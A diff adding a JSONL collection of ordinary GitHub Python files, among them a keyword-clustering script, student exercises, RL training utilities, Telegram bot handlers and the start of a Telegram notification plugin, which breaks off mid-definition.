diff --git "a/2437.jsonl" "b/2437.jsonl" new file mode 100644--- /dev/null +++ "b/2437.jsonl" @@ -0,0 +1,1687 @@ +{"seq_id":"5836839369","text":"import ast\nfrom statistics import mode\n\nimport pandas as pd\n\n# w tym pliku chcemy uzupelnic brakujace w dfce keywordy na podstawie podzialu na klastry i/lub slow kluczowych w klastrach\n\nf=open(\"lista_klastrow.csv\", \"r+\")\n\nfor line in f.readlines():\n clusters = (list(ast.literal_eval(line)))\n\n\ndf = pd.read_csv('preprocessed_2023.csv')\ndf = df.head(len(clusters))\n\nn_clusters = max(clusters)+1\n\nprint(n_clusters)\nprint(len(df))\n\ni=0\ndf['cluster'] = pd.Series(clusters)\n\nprint(df['cluster'])\n\n\n\nprint(n_clusters)\nkeywords_clusters = [[] for _ in range(n_clusters)]\nprint(keywords_clusters)\n\nfor i in range(301):\n tmp_clus = df.loc[i, 'cluster']\n tmp_keywords = list(ast.literal_eval(df.loc[i, 'keywords']))\n for keyword in tmp_keywords:\n keywords_clusters[tmp_clus].append(keyword)\n\n #(keywords_clusters[tmp_clus]).extend(tmp_keywords)\n\n#print(keywords_clusters)\n\nfrom collections import Counter\n\ndef most_common_elements(lst, n):\n # Use Counter to count the occurrences of each element\n counts = Counter(lst)\n\n # Get the n most common elements and their counts\n common_elements = [element for element, _ in counts.most_common(n)]\n\n return common_elements\n\nto_fill = []\nfor i in range(n_clusters):\n to_fill.append(most_common_elements(keywords_clusters[i], 3))\n\nprint(to_fill)\n\ndf = pd.read_csv('preprocessed_2023.csv')\ndf = df.head(len(clusters))\ndf['cluster'] = pd.Series(clusters)\n\n\ndef new_column(row):\n return to_fill[(row['cluster'])]\n\n# Apply the function to each row and create a new column 'new_column'\ndf['cluster_keywords'] = df.apply(new_column, axis=1)\n\n\nprint(df['cluster_keywords'])\n\ndf.to_csv('301_processed_with_clustering.csv')\n","repo_name":"CCzarek/hack4law","sub_path":"manage_keywords.py","file_name":"manage_keywords.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41180918902","text":"# Кривко Сергей ИУ7-14Б\n# Ввести трёхмерный массив, вывести из него i-й срез (матрицу - фрагмент трёхмерного массива) по второму индексу\n\n# Ввод трехмерного массива\nwhile True:\n x_size = int(input('Введите размер массива по x: '))\n if x_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\nwhile True:\n y_size = int(input('Введите размер массива по y: '))\n if y_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\nwhile True:\n z_size = int(input('Введите размер массива по z: '))\n if z_size > 0:\n break\n print('Размер массива должен быть натуральным числом')\na = []\nfor i in range(x_size):\n a.append([])\n for j in range(y_size):\n a[i].append([])\n for k in range(z_size):\n a[i][j].append(int(input('Введите элемент [{0}][{1}][{2}]: '.format(i + 1, j + 1, k + 1))))\n# Ввод номера среза\nwhile True:\n index = int(input('Введите номер среза: ')) - 1\n if 0 <= index < y_size:\n break\n print('Номер среза должен быть натуральным числом от 1 до {0}'.format(y_size))\n\n# Вывод среза\nprint()\nfor i in range(x_size):\n for j in range(z_size):\n print(' {0:5} '.format(a[i][index][j]), end='')\n print()\nprint()\n","repo_name":"SergeiKrivko/Labs","sub_path":"labs/Архив/lab9-7.py","file_name":"lab9-7.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71013388412","text":"# Problem: https://leetcode.com/problems/find-all-duplicates-in-an-array/description/\nclass Solution(object):\n def findDuplicates(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = []\n for i in xrange(len(nums)):\n if nums[abs(nums[i])-1] > 0:\n nums[abs(nums[i])-1] = -nums[abs(nums[i])-1]\n else:\n res.append(abs(nums[i]))\n return res\n","repo_name":"divyanshk/algorithms-and-data-structures","sub_path":"DuplicatesArray.py","file_name":"DuplicatesArray.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74484975292","text":"#-----INPUT/DADOS---------------------------------------\nx = [1,2,3,4,5,6,7,8,9,10]\ny = [1,2,3,6,7,8,11,12,13,67]\n\n# união de x e y, sem mostrar valores iguais\n\n# criar vetor para a uniao\nuniao = [0]*20\n\nfor i in range(10):\n uniao[i] = x[i]\n# pre = [1,2,3,4,5,6,7,8,9,10,0,0,0,0,0,0,0,0,0,0]\n\n#marcador para proximo indice livre\nproxlivre = 10\n\n#encontrar elementos de Y diferentes dos de X, ou diferentes dos de UNIAO, se houverem repeticoes dentro de Y.\n\n\nfor i in range(10): #indexador Y\n \n #Flag indicando que nao achei um numero igual\n achei = False\n \n for j in range(10): #indexador X\n \n if y[i] == uniao[j]:\n achei = True\n break\n \n # se cheguei aqui com achei==false, para esse y[i], nao ha elemento igual em X, e devo adiciona-lo em UNIAO.\n \n #if not achei:\n if achei == False:\n uniao[proxlivre] = y[i]\n proxlivre+=1\n\nprint (uniao)\n\n# Alternativa:\n#uniao=list(set(x + y))","repo_name":"gabireghelin/exercicios","sub_path":"uniao.py","file_name":"uniao.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27982883071","text":"import collections.abc\nimport os\nimport random\nfrom collections import defaultdict\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom mlagents_envs.base_env import ActionTuple\n# from PythonAcademy.models.dqn import DQN, dqn_loss\nfrom mlagents_envs.side_channel.environment_parameters_channel import EnvironmentParametersChannel\n\nfrom PythonAcademy.src.curriculum import Curriculum\nfrom PythonAcademy.src.wrappers import TensorActionTuple\n\n\ndef set_random_seed(environment, seed):\n\tenvironment.seed(seed)\n\tnp.random.seed(seed)\n\ttorch.manual_seed(seed)\n\trandom.seed(seed)\n\n\n# def load_model(model_type, path_weights, environment, memory_size=20, model_kwargs={}):\n# \tmodel = model_type(environment.observation_space.shape,\n# \t environment.action_space.n,\n# \t memory_size=memory_size,\n# \t **model_kwargs)\n# \tm = DQN(\n# \t\tlist(range(environment.action_space.n)),\n# \t\tmodel,\n# \t\toptimizer=\"sgd\",\n# \t\tloss_function=dqn_loss,\n# \t)\n# \tm.load_weights(path_weights)\n# \treturn m\n\n\ndef show_rewards(R: Iterable, **kwargs):\n\tplt.plot(R)\n\tplt.yticks(np.arange(max(np.min(R), -200), np.max(R) + 1, 50))\n\tplt.grid()\n\ttitle = kwargs.get(\"title\", \"Reward per episodes\")\n\tplt.title(title)\n\tplt.ylabel(\"Reward [-]\")\n\tplt.xlabel(\"Episodes [-]\")\n\n\tsubfolder = kwargs.get(\"subfolder\", False)\n\tif subfolder:\n\t\tos.makedirs(f\"figures/{subfolder}/\", exist_ok=True)\n\t\tplt.savefig(f\"figures/{subfolder}/Projet_{title.replace(' ', '_').replace(':', '_')}.png\", dpi=300)\n\telse:\n\t\tos.makedirs(\"RNN/figures/\", exist_ok=True)\n\t\tplt.savefig(f\"figures/Projet_{title.replace(' ', '_').replace(':', '_')}.png\", dpi=300)\n\tplt.show(block=kwargs.get(\"block\", True))\n\n\ndef batchwise_temporal_filter(x: torch.Tensor, decay: float = 0.9):\n\t\"\"\"\n\t:param x: (batch_size, time_steps, ...)\n\t:param decay:\n\t:return:\n\t\"\"\"\n\tbatch_size, time_steps, *_ = x.shape\n\tassert time_steps >= 1\n\n\tpowers = torch.arange(time_steps, dtype=torch.float32, device=x.device).flip(0)\n\tweighs = torch.pow(decay, powers)\n\n\tx = torch.mul(x, weighs.unsqueeze(0).unsqueeze(-1))\n\tx = torch.sum(x, dim=1)\n\treturn x\n\n\ndef mapping_update_recursively(d, u):\n\t\"\"\"\n\tfrom https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth\n\t:param d: mapping item that wil be updated\n\t:param u: mapping item updater\n\t:return: updated mapping recursively\n\t\"\"\"\n\tfor k, v in u.items():\n\t\tif isinstance(v, collections.abc.Mapping):\n\t\t\td[k] = mapping_update_recursively(d.get(k, {}), v)\n\t\telse:\n\t\t\td[k] = v\n\treturn d\n\n\nclass TrainingHistory:\n\tdef __init__(self, container: Dict[str, List[float]] = None):\n\t\tself.container = defaultdict(list)\n\t\tif container is not None:\n\t\t\tself.container.update(container)\n\n\tdef __getitem__(self, item):\n\t\treturn self.container[item]\n\n\tdef __setitem__(self, key, value):\n\t\tself.container[key] = value\n\n\tdef __contains__(self, item):\n\t\treturn item in self.container\n\n\tdef __iter__(self):\n\t\treturn iter(self.container)\n\n\tdef __len__(self):\n\t\treturn len(self.container)\n\n\tdef items(self):\n\t\treturn self.container.items()\n\n\tdef concat(self, other):\n\t\tfor key, values in other.items():\n\t\t\tif isinstance(values, list):\n\t\t\t\tself.container[key].extend(values)\n\t\t\telse:\n\t\t\t\tself.container[key].append(values)\n\n\tdef append(self, key, value):\n\t\tself.container[key].append(value)\n\n\tdef min(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\treturn min(self[key])\n\t\treturn np.inf\n\n\tdef min_item(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\targmin = np.argmin(self[key])\n\t\t\treturn {k: v[argmin] for k, v in self.items()}\n\t\traise ValueError(\"key not in container\")\n\n\tdef max(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\treturn max(self[key])\n\t\treturn -np.inf\n\n\tdef max_item(self, key=None):\n\t\tif key is None:\n\t\t\tkey = list(self.container.keys())[0]\n\t\tif key in self:\n\t\t\targmax = np.argmax(self[key])\n\t\t\treturn {k: v[argmax] for k, v in self.items()}\n\t\traise ValueError(\"key not in container\")\n\n\t@staticmethod\n\tdef _set_default_plot_kwargs(kwargs: dict):\n\t\tkwargs.setdefault('fontsize', 16)\n\t\tkwargs.setdefault('linewidth', 3)\n\t\tkwargs.setdefault('figsize', (16, 12))\n\t\tkwargs.setdefault('dpi', 300)\n\t\treturn kwargs\n\n\tdef plot(\n\t\t\tself,\n\t\t\tsave_path=None,\n\t\t\tshow=False,\n\t\t\t**kwargs\n\t):\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tloss_metrics = [k for k in self.container if 'loss' in k.lower()]\n\t\tother_metrics = [k for k in self.container if k not in loss_metrics]\n\t\tn_cols = int(np.sqrt(1 + len(other_metrics)))\n\t\tn_rows = int((1 + len(other_metrics)) / n_cols)\n\t\tfig, axes = plt.subplots(nrows=n_rows, ncols=n_cols, figsize=kwargs[\"figsize\"], sharex='all')\n\t\taxes = np.ravel(axes)\n\t\tfor i, ax in enumerate(axes):\n\t\t\tif i == 0:\n\t\t\t\tfor k in loss_metrics:\n\t\t\t\t\tax.plot(self[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\tax.set_ylabel(\"Loss [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\telse:\n\t\t\t\tk = other_metrics[i - 1]\n\t\t\t\tax.plot(self[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\tif save_path is not None:\n\t\t\tplt.savefig(save_path, dpi=kwargs[\"dpi\"])\n\t\tif show:\n\t\t\tplt.show()\n\t\tplt.close(fig)\n\n\nclass TrainingHistoriesMap:\n\tREPORT_KEY = \"report\"\n\n\tdef __init__(self, curriculum: Optional[Curriculum] = None):\n\t\tself.curriculum = curriculum\n\t\tself.histories = defaultdict(TrainingHistory, **{TrainingHistoriesMap.REPORT_KEY: TrainingHistory()})\n\n\t@property\n\tdef report_history(self) -> TrainingHistory:\n\t\treturn self.histories[TrainingHistoriesMap.REPORT_KEY]\n\n\tdef max(self, key=None):\n\t\tif self.curriculum is None:\n\t\t\treturn self.histories[TrainingHistoriesMap.REPORT_KEY].max(key)\n\t\telse:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].max(key)\n\n\tdef concat(self, other):\n\t\tself.histories[TrainingHistoriesMap.REPORT_KEY].concat(other)\n\t\tif self.curriculum is not None:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].concat(other)\n\n\tdef append(self, key, value):\n\t\tself.histories[TrainingHistoriesMap.REPORT_KEY].append(key, value)\n\t\tif self.curriculum is not None:\n\t\t\treturn self.histories[self.curriculum.current_lesson.name].append(key, value)\n\n\t@staticmethod\n\tdef _set_default_plot_kwargs(kwargs: dict):\n\t\tkwargs.setdefault('fontsize', 16)\n\t\tkwargs.setdefault('linewidth', 3)\n\t\tkwargs.setdefault('figsize', (16, 12))\n\t\tkwargs.setdefault('dpi', 300)\n\t\treturn kwargs\n\n\tdef plot(self, save_path=None, show=False, lesson_idx: Optional[Union[int, str]] = None, **kwargs):\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tif self.curriculum is None:\n\t\t\tassert lesson_idx is None, \"lesson_idx must be None if curriculum is None\"\n\t\t\treturn self.plot_history(TrainingHistoriesMap.REPORT_KEY, save_path, show, **kwargs)\n\t\tif lesson_idx is None:\n\t\t\tself.plot_history(TrainingHistoriesMap.REPORT_KEY, save_path, show, **kwargs)\n\t\telse:\n\t\t\tself.plot_history(self.curriculum[lesson_idx].name, save_path, show, **kwargs)\n\n\tdef plot_history(\n\t\t\tself,\n\t\t\thistory_name: str,\n\t\t\tsave_path=None,\n\t\t\tshow=False,\n\t\t\t**kwargs\n\t):\n\t\tos.makedirs(os.path.dirname(save_path), exist_ok=True)\n\t\thistory = self.histories[history_name]\n\t\tif self.curriculum is not None and history_name != TrainingHistoriesMap.REPORT_KEY:\n\t\t\tlessons = [self.curriculum[history_name]]\n\t\t\tlessons_start_itr = [0]\n\t\telif self.curriculum is not None and history_name == TrainingHistoriesMap.REPORT_KEY:\n\t\t\tlessons = self.curriculum.lessons\n\t\t\tlessons_lengths = {k: [len(self.histories[lesson.name][k]) for lesson in lessons] for k in history.container}\n\t\t\tlessons_start_itr = {k: np.cumsum(lessons_lengths[k]) for k in history.container}\n\t\telse:\n\t\t\tlessons = []\n\t\t\tlessons_start_itr = []\n\n\t\tkwargs = self._set_default_plot_kwargs(kwargs)\n\t\tloss_metrics = [k for k in history.container if 'loss' in k.lower()]\n\t\trewards_metrics = [k for k in history.container if 'reward' in k.lower()]\n\t\tother_metrics = [k for k in history.container if k not in loss_metrics and k not in rewards_metrics]\n\t\tn_metrics = 2 + len(other_metrics)\n\t\tn_cols = int(np.sqrt(n_metrics))\n\t\tn_rows = int(n_metrics / n_cols)\n\t\tfig, axes = plt.subplots(nrows=n_rows, ncols=n_cols, figsize=kwargs[\"figsize\"], sharex='all')\n\t\tif axes.ndim == 1:\n\t\t\taxes = np.expand_dims(axes, axis=-1)\n\t\tfor row_i in range(n_rows):\n\t\t\tfor col_i in range(n_cols):\n\t\t\t\tax = axes[row_i, col_i]\n\t\t\t\travel_index = row_i * n_cols + col_i\n\t\t\t\tif ravel_index == 0:\n\t\t\t\t\tfor k in loss_metrics:\n\t\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\tax.set_ylabel(\"Loss [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\telif ravel_index == 1:\n\t\t\t\t\tfor k in rewards_metrics:\n\t\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\t\tfor lesson_idx, lesson in enumerate(lessons):\n\t\t\t\t\t\t\tif lesson.completion_criteria.measure == k:\n\t\t\t\t\t\t\t\tax.plot(\n\t\t\t\t\t\t\t\t\tlesson.completion_criteria.threshold*np.ones(len(history[k])), 'k--',\n\t\t\t\t\t\t\t\t\tlabel=f\"{k} threshold\", linewidth=kwargs['linewidth']\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tif history_name == TrainingHistoriesMap.REPORT_KEY and lesson.is_completed:\n\t\t\t\t\t\t\t\tax.axvline(\n\t\t\t\t\t\t\t\t\tlessons_start_itr[k][lesson_idx], ymin=np.min(history[k]), ymax=np.max(history[k]),\n\t\t\t\t\t\t\t\t\tcolor='r', linestyle='--', linewidth=kwargs['linewidth'], label=f\"lesson start\"\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\tax.set_ylabel(\"Rewards [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\telse:\n\t\t\t\t\tk = other_metrics[ravel_index - 1]\n\t\t\t\t\tax.plot(history[k], label=k, linewidth=kwargs['linewidth'])\n\t\t\t\t\tax.legend(fontsize=kwargs[\"fontsize\"])\n\t\t\t\tif row_i == n_rows - 1:\n\t\t\t\t\tax.set_xlabel(\"Iterations [-]\", fontsize=kwargs[\"fontsize\"])\n\t\t\t\tlegend_without_duplicate_labels_(ax)\n\t\tif save_path is not None:\n\t\t\tplt.savefig(save_path, dpi=kwargs[\"dpi\"])\n\t\tif show:\n\t\t\tplt.show()\n\t\tplt.close(fig)\n\n\ndef to_tensor(x, dtype=torch.float32):\n\tif isinstance(x, np.ndarray):\n\t\treturn torch.from_numpy(x).type(dtype)\n\telif not isinstance(x, torch.Tensor):\n\t\treturn torch.tensor(x, dtype=dtype)\n\treturn x.type(dtype)\n\n\ndef linear_decay(init_value, min_value, decay_value, current_itr):\n\treturn max(init_value * decay_value ** current_itr, min_value)\n\n\ndef send_parameter_to_channel(\n\t\tchannel: EnvironmentParametersChannel,\n\t\tparameters: Dict[str, Any]\n) -> Dict[str, float]:\n\t\"\"\"\n\tConvert a dictionary of parameters to a dictionary of floats and send it to the channel.\n\t:param channel: The channel to send the parameters to.\n\t:param parameters: The parameters to send. Each value should be able to be converted to a float.\n\t:return: The parameters as floats.\n\t\"\"\"\n\tfloat_params = {k: float(v) for k, v in parameters.items()}\n\tfor key, value in float_params.items():\n\t\tchannel.set_float_parameter(key, value)\n\treturn float_params\n\n\ndef threshold_image(image: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:\n\tif isinstance(image, np.ndarray):\n\t\treturn np.where(image > 0.5, 1.0, 0.0).astype(image.dtype)\n\telif isinstance(image, torch.Tensor):\n\t\treturn torch.where(image > 0.5, torch.ones_like(image), torch.zeros_like(image)).type(image.dtype)\n\telse:\n\t\traise ValueError(\"image must be a numpy array or a torch tensor\")\n\n\ndef unbatch_actions(\n\t\tactions: Union[ActionTuple, TensorActionTuple]\n) -> List[Union[ActionTuple, TensorActionTuple]]:\n\t\"\"\"\n\t:param actions: shape: (batch_size, ...)\n\t:return:\n\t\"\"\"\n\tdtype = type(actions)\n\tactions_list = []\n\tcontinuous, discrete = actions.continuous, actions.discrete\n\tbatch_size = actions.continuous.shape[0] if continuous is not None else discrete.shape[0]\n\tassert batch_size is not None\n\tfor i in range(batch_size):\n\t\tactions_list.append(\n\t\t\tdtype(\n\t\t\t\tcontinuous[i] if continuous is not None else None,\n\t\t\t\tdiscrete[i] if discrete is not None else None)\n\t\t)\n\treturn actions_list\n\n\ndef discount_rewards(r, gamma=0.99, value_next=0.0):\n\t\"\"\"\n\tComputes discounted sum of future rewards for use in updating value estimate.\n\t:param r: List of rewards.\n\t:param gamma: Discount factor.\n\t:param value_next: T+1 value estimate for returns calculation.\n\t:return: discounted sum of future rewards as list.\n\t\"\"\"\n\tdiscounted_r = np.zeros_like(r)\n\trunning_add = value_next\n\tfor t in reversed(range(0, r.size)):\n\t\trunning_add = running_add * gamma + r[t]\n\t\tdiscounted_r[t] = running_add\n\treturn discounted_r\n\n\ndef compute_advantage(rewards, value_estimates, value_next=0.0, gamma=0.99, lambd=0.95):\n\t\"\"\"\n\tComputes generalized advantage estimate for use in updating policy.\n\t:param rewards: list of rewards for time-steps t to T.\n\t:param value_next: Value estimate for time-step T+1.\n\t:param value_estimates: list of value estimates for time-steps t to T.\n\t:param gamma: Discount factor.\n\t:param lambd: GAE weighing factor.\n\t:return: list of advantage estimates for time-steps t to T.\n\t\"\"\"\n\tvalue_estimates = np.append(value_estimates, value_next)\n\tdelta_t = rewards + gamma * value_estimates[1:] - value_estimates[:-1]\n\tadvantage = discount_rewards(r=delta_t, gamma=gamma * lambd)\n\treturn advantage\n\n\ndef legend_without_duplicate_labels_(ax: plt.Axes):\n\thandles, labels = ax.get_legend_handles_labels()\n\tunique = [(h, l) for i, (h, l) in enumerate(zip(handles, labels)) if l not in labels[:i]]\n\tax.legend(*zip(*unique))\n\n","repo_name":"JeremieGince/MAVControlWithSNN","sub_path":"PythonAcademy/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"6057093812","text":"\"\"\"\nBasic classes for modeling Typed Feature Structures.\n\nThis module defines the TypedFeatureStructure class, which models an\nattribute value matrix (AVM) with a type. It allows one to access\nfeatures through TDL-style dot notation, or through regular dictionary\naccess.\n\"\"\"\n\nclass TypedFeatureStructure(object):\n\n __slots__ = ['_type', '_avm']\n\n def __init__(self, type, featvals=None):\n self._type = type\n self._avm = {}\n if isinstance(featvals, dict):\n featvals = featvals.items()\n for feat, val in list(featvals or []):\n self[feat] = val\n\n @classmethod\n def default(cls): return cls(None)\n\n def __repr__(self):\n return ''.format(\n self.type, id(self)\n )\n\n def __setitem__(self, key, val):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n if len(subkeys) == 1:\n self._avm[subkey] = val\n else:\n if subkey in self._avm:\n subdef = self._avm[subkey]\n else:\n subdef = self._avm[subkey] = self.default()\n subdef[subkeys[1]] = val\n\n def __getitem__(self, key):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n val = self._avm[subkey]\n if len(subkeys) == 2:\n val = val[subkeys[1]]\n return val\n\n def __contains__(self, key):\n subkeys = key.split('.', 1)\n subkey = subkeys[0].upper()\n if subkey in self._avm:\n if len(subkeys) == 2:\n return subkeys[1] in self._avm[subkey]\n else:\n return True\n return False\n\n @property\n def type(self):\n return self._type\n @type.setter\n def type(self, value):\n self._type = value\n\n def get(self, key, default=None):\n try:\n val = self[key]\n except KeyError:\n val = default\n return val\n\n def _is_notable(self):\n \"\"\"\n Notability determines if the TFS should be listed as the value\n of a feature or if the feature should just \"pass through\" its\n avm to get the next value. A notable TypedFeatureStructure is\n one with more than one sub-feature.\n \"\"\"\n return len(self._avm) != 1\n\n def features(self):\n fs = []\n for feat, val in self._avm.items():\n try:\n if val._is_notable():\n fs.append((feat, val))\n else:\n for subfeat, subval in val.features():\n fs.append(('{}.{}'.format(feat, subfeat), subval))\n except AttributeError:\n fs.append((feat, val))\n return fs\n","repo_name":"draplater/hrg-parser","sub_path":"delphin/tfs.py","file_name":"tfs.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"78"} +{"seq_id":"18595504055","text":"from fractions import Fraction\nfrom itertools import tee\n\nfrom gon.base import Point\n\n\ndef pairwise(iterable):\n \"\"\"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\"\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\ndef find_vertical_countersegment_end(*,\n domain_end: Point,\n countersegment_start: Point,\n area: Fraction) -> Point:\n dx = countersegment_start.x - domain_end.x\n signed_lower_area = dx * (domain_end.y - countersegment_start.y) / 2\n countersegment_end_y = (area - signed_lower_area) * 2 / dx + domain_end.y\n return Point(countersegment_start.x, countersegment_end_y)\n","repo_name":"GeorgySk/pdan","sub_path":"tests/pdan_tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30629259340","text":"import random\nimport urllib.request\n\n\ndef downloadWebImage(url):\n name = random.randrange(1,1000)\n fullname = str(name) +\".jpg\" #str convert number to string value\n urllib.request.urlretrieve(url, fullname)\n\n\ndownloadWebImage(\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSLuQZO9YQzSN1RKGd2Zw80QqByf4mPdQMwwYwh7tPxo9RL6A7G\")","repo_name":"SMGuellord/PythonTut","sub_path":"modules/downloadImageFromWeb.py","file_name":"downloadImageFromWeb.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7260688711","text":"def Fibonacci(v):\n table = [1, 1] + [0] * (v-2)\n\n for i in range(2, len(table)):\n table[i] = table[i - 1] + table[i - 2]\n\n return table[-1]\n\n\nif __name__ == '__main__':\n print(Fibonacci(9))","repo_name":"demyank88/datastructureAlgorithm","sub_path":"dynamicprogramming/Fibonacci/tabulation.py","file_name":"tabulation.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23131570219","text":"from aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.builtin import CommandStart\n\nfrom bot.utils.keyboards import main_menu_keyboard\nfrom bot.utils.misc import reset_user_data\nfrom bot.utils.states import cryption_states_names\n\n\nasync def cmd_start(message: types.Message, state: FSMContext):\n \"\"\"Resets the current user data and sends a welcome message - serves as an entry point for the bot user.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"Steganography is the art and science of invisible communication. \"\n \"It is achieved by hiding the message information in some other carrier media.\\n\\n\"\n \"Image steganography is a subset of steganography where messages are hidden in image files. \"\n \"The original image, before any message is hidden in it, is referred to as the cover image. \"\n \"After hiding the message in it, it is referred to as the stego image. \"\n \"For human eye, these two images must be identical (in appearance at least).\",\n reply_markup=main_menu_keyboard\n )\n await message.answer(\n \"This bot provides image steganography tools to hide secret text messages, \"\n \"both for encryption and decryption. \"\n \"Additionally, this implementation also enhance the security of the steganography through data encryption.\\n\\n\"\n \"The source code of the bot is available to everyone to contribute to and reuse, \"\n \"as defined by the open license used for the project:\\n\"\n \"https://github.com/tyranus-project/steganography-telegram-bot\",\n disable_web_page_preview=True\n )\n await message.answer(\n \"Just use the menu buttons or commands and follow the instructions in the messages:\\n\"\n \"/encrypt to start encryption process\\n\"\n \"/decrypt to start decryption process\"\n )\n\n\nasync def cmd_main_menu(message: types.Message, state: FSMContext):\n \"\"\"Resets the current user data and switches the user to the main menu.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"Main menu\",\n reply_markup=main_menu_keyboard\n )\n\n\nasync def cancel_action(message: types.Message, state: FSMContext):\n \"\"\"Interrupts the encryption/decryption processes by resetting the user data, switches the user to the main menu.\"\"\"\n await reset_user_data(message, state)\n await message.answer(\n \"The current action has been cancelled.\",\n reply_markup=main_menu_keyboard\n )\n\n\ndef register_common_handlers(dp: Dispatcher):\n \"\"\"Sets the common handlers.\"\"\"\n dp.register_message_handler(cmd_start, CommandStart(), state=\"*\")\n dp.register_message_handler(cmd_main_menu, commands=[\"menu\"], state=\"*\")\n dp.register_message_handler(cancel_action, Text(equals=\"Cancel\", ignore_case=True), state=cryption_states_names)\n","repo_name":"tyranus-project/steganography-telegram-bot","sub_path":"bot/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39591981634","text":"import requests\nimport re\n\nfrom json import loads\nfrom json import dumps\n\nfrom .NotifyBase import NotifyBase\nfrom ..common import NotifyType\nfrom ..common import NotifyImageSize\nfrom ..common import NotifyFormat\nfrom ..utils import parse_bool\nfrom ..utils import parse_list\nfrom ..AppriseLocale import gettext_lazy as _\n\nTELEGRAM_IMAGE_XY = NotifyImageSize.XY_256\n\n# Token required as part of the API request\n# allow the word 'bot' infront\nVALIDATE_BOT_TOKEN = re.compile(\n r'^(bot)?(?P[0-9]+:[a-z0-9_-]+)/*$',\n re.IGNORECASE,\n)\n\n# Chat ID is required\n# If the Chat ID is positive, then it's addressed to a single person\n# If the Chat ID is negative, then it's targeting a group\nIS_CHAT_ID_RE = re.compile(\n r'^(@*(?P-?[0-9]{1,32})|(?P[a-z_-][a-z0-9_-]+))$',\n re.IGNORECASE,\n)\n\n\nclass NotifyTelegram(NotifyBase):\n \"\"\"\n A wrapper for Telegram Notifications\n \"\"\"\n # The default descriptive name associated with the Notification\n service_name = 'Telegram'\n\n # The services URL\n service_url = 'https://telegram.org/'\n\n # The default secure protocol\n secure_protocol = 'tgram'\n\n # A URL that takes you to the setup/help of the specific protocol\n setup_url = 'https://github.com/caronc/apprise/wiki/Notify_telegram'\n\n # Telegram uses the http protocol with JSON requests\n notify_url = 'https://api.telegram.org/bot'\n\n # Allows the user to specify the NotifyImageSize object\n image_size = NotifyImageSize.XY_256\n\n # The maximum allowable characters allowed in the body per message\n body_maxlen = 4096\n\n # Define object templates\n templates = (\n '{schema}://{bot_token}',\n '{schema}://{bot_token}/{targets}',\n )\n\n # Define our template tokens\n template_tokens = dict(NotifyBase.template_tokens, **{\n 'bot_token': {\n 'name': _('Bot Token'),\n 'type': 'string',\n 'private': True,\n 'required': True,\n 'regex': 